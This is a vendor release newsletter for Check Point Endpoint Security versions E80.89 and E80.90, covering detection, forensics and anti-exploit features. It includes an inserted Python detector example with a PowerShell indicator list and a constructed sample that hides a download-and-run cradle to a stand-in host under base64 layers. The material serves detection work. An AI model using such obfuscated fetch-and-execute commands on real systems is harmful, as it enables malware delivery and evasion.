Gil Sasson

Endpoint Security / SandBlast Agent Newsletter - Versions E80.89 & E80.90

Discussion created by Gil Sasson Employee on Jan 10, 2019


Hi,

In the past few weeks we released two monthly releases of Endpoint Security / SandBlast Agent, versions E80.89 and E80.90.

This newsletter will summarize the new features and enhancements delivered in these releases and will begin a new tradition of Endpoint security newsletters we will send upon each release in 2019.

We will be happy to hear feedback or any suggestions for improvement.


New Features:


  • Windows 10 October 2018 Update Support
  • Windows Server 2019 Support
  • No Reboot Deployment

Until now, upgrading to a new Endpoint client had a big impact on company employees, because everyone had to reboot their machines. To improve this experience and make deployment smoother, we removed the need to reboot in most upgrade and installation scenarios.


  • Upgrades from E80.89 to later releases for most blades are supported without reboots.
  • Note: Upgrades of some Full Disk Encryption, Media Encryption and Port Protection, Capsule Docs and Anti-Malware versions might still require a reboot (see sk141233).


  • Enhanced Fileless and Malicious PowerShell Detections engine extending Behavioral Guard capabilities.

Fileless attacks are a fast-growing class of attacks that do not save a malicious file to disk. Instead, they use scripting engines shipped with Microsoft Windows, such as PowerShell. In this release, we extend Behavioral Guard to protect against fileless and PowerShell-based attacks.


  • Behavioral Guard now includes a multi-phase detection in order to overcome PowerShell obfuscation and encoding techniques.
  • In addition, in Windows 10, Behavioral Guard integrates with Microsoft’s Anti-Malware Scan Interface (AMSI) to receive and analyze decoded scripts.
  • On detection, the script content is visible in the Forensics report for further analysis.
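To illustrate the decode-then-inspect idea behind the multi-phase detection described above, here is an added Python example (my own code, not Check Point's and not the Behavioral Guard engine) that peels the -EncodedCommand layer and nested FromBase64String layers off a constructed PowerShell command line, then scans every layer for indicator strings. The indicator list, the sample command line and the example.invalid URL are assumptions made for the example.

```python
import base64
import re

# Illustrative indicator strings (an assumption here, not a product signature list).
INDICATORS = ("Invoke-Expression", "IEX", "DownloadString",
              "Net.WebClient", "FromBase64String", "-w hidden")
# -EncodedCommand (and common abbreviations) followed by a base64 blob, and an
# inline base64 literal passed to FromBase64String() inside a decoded layer.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
INNER_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)

def _decode(b64):
    """Decode one base64 layer: -EncodedCommand is UTF-16LE, inner layers are often UTF-8."""
    raw = base64.b64decode(b64, validate=True)
    if len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")

def unwrap_layers(cmdline, max_layers=5):
    """Phases 1-2: peel the -EncodedCommand layer, then nested FromBase64String layers."""
    layers = []
    current = cmdline
    for _ in range(max_layers):
        match = ENC_FLAG.search(current) or INNER_B64.search(current)
        if not match:
            break
        try:
            current = _decode(match.group(1))
        except (ValueError, UnicodeDecodeError):
            break  # not valid base64 or text: stop rather than guess
        layers.append(current)
    return layers

def analyze(cmdline):
    """Phase 3: scan the raw command line and every decoded layer for indicators."""
    layers = unwrap_layers(cmdline)
    hits = []
    for text in [cmdline, *layers]:
        low = text.lower()
        hits += [i for i in INDICATORS if i.lower() in low and i not in hits]
    return {"layers": layers, "indicators": hits, "suspicious": bool(layers and hits)}

def build_sample():
    """Constructed sample: a download-and-run one-liner under two encoding layers."""
    inner = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.txt')"
    inner_b64 = base64.b64encode(inner.encode("utf-8")).decode("ascii")
    middle = ("Invoke-Expression ([Text.Encoding]::UTF8.GetString("
              f"[Convert]::FromBase64String('{inner_b64}')))")
    outer_b64 = base64.b64encode(middle.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -nop -w hidden -enc {outer_b64}"
```

Indicators found only in the raw command line would miss the download cradle entirely; it appears only after the second layer is decoded, which is the point of unwrapping before matching.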


  • Forensic report overhaul with a new style and completely redesigned Overview and General screens.

As attacks evolve, there is an ever greater need to identify, classify and prioritize the attacks being mitigated on the endpoint. To that end, we have changed the Forensics report to include and highlight reputation and attack data. This means tighter integration with Reputation and a redesigned Forensic Report with more emphasis on the attack details.


  • Redesigned Overview screen with focus on attack details, type and name
  • Redesigned General screen with more details on the trigger for the attack
  • The Malware Family name, when present, is shown in both the Overview and the individual process details.
  • The Tree and Tree-Timeline views were updated with navigation toolbars that make it quicker to find processes of interest.
  • Many more changes are included; see the full release notes.


  • Forensics now has major performance improvements.

Forensics is one of the most powerful EDR systems that exist today; however, it records a lot of data, and this has led to I/O issues on a few machines. By analyzing the data collected over a two-year period, we identified records that do not need to be stored for the Forensic Report to be generated accurately.


  • Reduced the number of file operations stored by about 50% on average.
  • Reduced the number of registry operations stored by about 10% on average.
  • Improved Forensics Analyzer performance by about 20% on average.


  • Anti-Exploit new detections and default protections

We continue to strengthen our Anti-Exploit technology with protection against new attack vectors. Anti-Exploit relies on the fact that there is a limited number of methods by which a vulnerability in a process can be exploited (such as Return Oriented Programming), and it includes protections for these methods. This provides automatic protection against new zero-day attacks that exploit new vulnerabilities. By monitoring the exploit landscape, we have added another protection and extended our protections to cover a new application.


  • Stack Pivoting protection – added protection against a technique in which an exploit attempts to create a fake stack from attacker-controlled memory, such as the heap.
  • MS Equation Editor protection – given the prevalence of attacks that target Equation Editor, we added it to our default protected processes.


These releases also include many improvements and enhancements:

E80.90:

  • Anti-Ransomware, Behavioral Guard and Forensics
  • Improves Forensic reports with decoded PowerShell scripts from AMSI integration.

This feature is only available in Windows 10.

  • Improves Forensics performance by adding dynamic exclusions for file operations based on a new heuristic.

This can reduce the number of file operations stored by up to 30%.

  • Updates the default exclusions for Anti-Ransomware.
  • Enhances Behavioral Guard with the ability to do deep inspections of both behavior and script content of PowerShell and Fileless attacks.
  • Adds many new suspicious events for the Forensic report, including new PowerShell related suspicious events.
  • Fixes an issue that could lead to incomplete termination of processes involved in a Ransomware incident.
  • Improves Entry Point calculations across multiple scenarios to be more accurate in the Forensic Report.
  • The Forensics report now shows the termination status of every process present in the report.
  • Fixes an issue where some Forensic report icons may be missing when upgrading to E80.89.

The icons are now present when upgrading to E80.90.

  • Fixes a rare issue with sustained high CPU utilization when the Forensics service is unable to communicate with the driver.
  • Improves Forensic performance by adding static exclusions for well-known file operations.

This addition alone can reduce the number of file operations stored by up to 80% on some machines.

  • Fixes a crash occurring when Forensics, Anti-Ransomware and Behavior Guard are processing an existing policy while receiving a new policy.
  • Fixes an issue with the scroll bar not appearing correctly if there are multiple nodes in the Entry Point view of the Forensics Report.
  • Fixes a Forensics Analysis issue where script processes like PowerShell do not appear in the report when Cmd is involved and the script process is not the trigger.
  • Fixes a majority of issues where the Entry Point of an attack could be empty.

Now there should almost always be an Entry Point.

  • Processes showing in a report that are closed at the time of the generation of the report will now correctly show as terminated, even if the remediation policy for termination is disabled.
  • Improves the Forensics report so that Command Prompts (cmd.exe) opened for typing no longer appear in the Forensic report, but may appear in the Entry Point instead.
  • Process arguments and script contents are now encoded in the Forensic reports.

This prevents the deletion of the reports by Anti-Viruses looking for specific signatures found in the argument or script content.

  • Adds support to include the Malware Family from URL reputation if present in the Forensic report.
  • Improves the Forensic Analysis to consider following files named in the arguments of processes already included as part of the incident.
  • Fixes an issue which could result in the User Name appearing empty in the Forensic Report.
  • Fixes a visual issue in the Forensic report where the distance between processes could be very large if a process has a lot of lines of text.
  • Fixes an issue which caused duplication of log events in Forensics.
  • Improves Forensic performance by dynamically excluding registry operations based on a new heuristic.

On average, 10% of registry operations are now excluded.


  • Threat Emulation and Anti-Exploit
  • Anti-Exploit now has an additional exploit prevention technology called stack pivoting.
  • Anti-Exploit now protects Equation Editor from known and unknown exploit attempts.


  • Anti-Bot
  • Fixes a crash when the Anti-Bot database is held by another process in the system.


  • SandBlast Agent Updater
  • Adds support for Static Analysis updates running in parallel to other updates using the Updater.
  • Fixes an issue where the wrong service is restarted when updating two products together.


E80.89:

  • Anti-Ransomware, Behavioral Guard and Forensics
    • Forensics reports no longer show Anti-Bot in "detect" mode as having a "Blocked" status.
    • Resolves a Forensics Analysis issue where incidents that include the Task Scheduler could add unrelated processes to the Forensics report.
    • Resolves a Forensics analysis issue where some "riskware" processes were not properly followed and terminated.
    • Forensics reports now include the Malware Family Name, when available, in the reputation section of a process.
    • Resolves a rare Forensics analysis issue where an entry point jumped between different browsers incorrectly.
    • The Forensic report's network view now shows entry point URLs and associated domains.
    • Enforces exclusions of file activity related to Check Point signed processes in the driver to improve Forensics performance.
  • Threat Emulation and Anti-Exploit
    • Resolves a few cases where Threat Emulation file monitoring locked a file and interfered with other applications' use of it.
  • SandBlast Agent Infrastructure
    • Resolves an issue where Remediation request ID collisions interfered with remediation when multiple requests arrived together.
  • Client Infrastructure
    • Improves Software Development Status reporting.

For more information about E80.90, refer to: Enterprise Endpoint Security E80.90 Windows Clients

For more information about E80.89, refer to: Enterprise Endpoint Security E80.89 Windows Clients

Please contact us if you encounter any issues. We are happy to hear from you at any time. Your feedback is valuable to us.


Thank you,

Gil Sasson

Endpoint Cyber Security Project Manager
